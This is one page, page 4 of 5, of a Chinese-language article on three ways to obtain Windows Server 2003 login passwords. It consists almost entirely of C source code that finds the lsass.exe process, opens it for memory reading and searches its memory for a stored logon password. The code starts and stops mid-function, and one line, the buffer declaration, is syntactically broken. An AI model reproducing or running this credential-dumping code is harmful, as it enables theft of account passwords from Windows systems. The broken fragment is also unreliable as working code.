在win 2003中三大方法助你得到登陆密码
  • 作者:木木
  • 时间:2022-12-24

  }

  else

  {

  break;

  }

  }

  return i + 7; // One Flag To Indicate We Find The Password

  }

  }

  }

  return -1; // Well,We Fail To Find The Password,And This Always Happens

  }

  // End Search

  //------------------------------------------------------------------------------------

  // Purpose: To Get The Lsass.exe PID

  // Return Type: DWORD

  // Parameters: None

  //------------------------------------------------------------------------------------

  DWORD GetLsassPID()

  {

  HANDLE hProcessSnap;

  HANDLE hProcess = NULL;

  PROCESSENTRY32 pe32;

  DWORD PID = 0;

  hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

  if( hProcessSnap == INVALID_HANDLE_VALUE )

  {

  printf("Fail To Create Snap Shot\n");

  return 0;

  }

  pe32.dwSize = sizeof(PROCESSENTRY32);

  if( !Process32First(hProcessSnap, &pe32))

  {

  CloseHandle(hProcessSnap); // Must clean up the snapshot object!

  return 0;

  }

  do

  {

  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

  {

  PID = pe32.th32ProcessID;

  break;

  }

  }while(Process32Next( hProcessSnap, &pe32));

  CloseHandle( hProcessSnap);

  return PID;

  }

  // End GetLsassPID()

  //------------------------------------------------------------------------------------

  // Purpose: To Find The Password

  // Return Type: BOOLEAN

  // Parameters:

  // In: DWORD PID -> The Lsass.exe's PID

  //------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID)

  {

  HANDLE hProcess = NULL;

  char Buffer[5 * 1024] = ;

  DWORD ByteGet = 0;

  int Found = -1;

  hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

  if (hProcess == NULL)

  {

  printf("Fail To Open Process\n");

  return FALSE;

  }

  if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe

  {

  printf("Fail To Read Memory\n");

 4/5   首页 上一页 2 3 4 5 下一页 尾页
相关推荐
用户评论区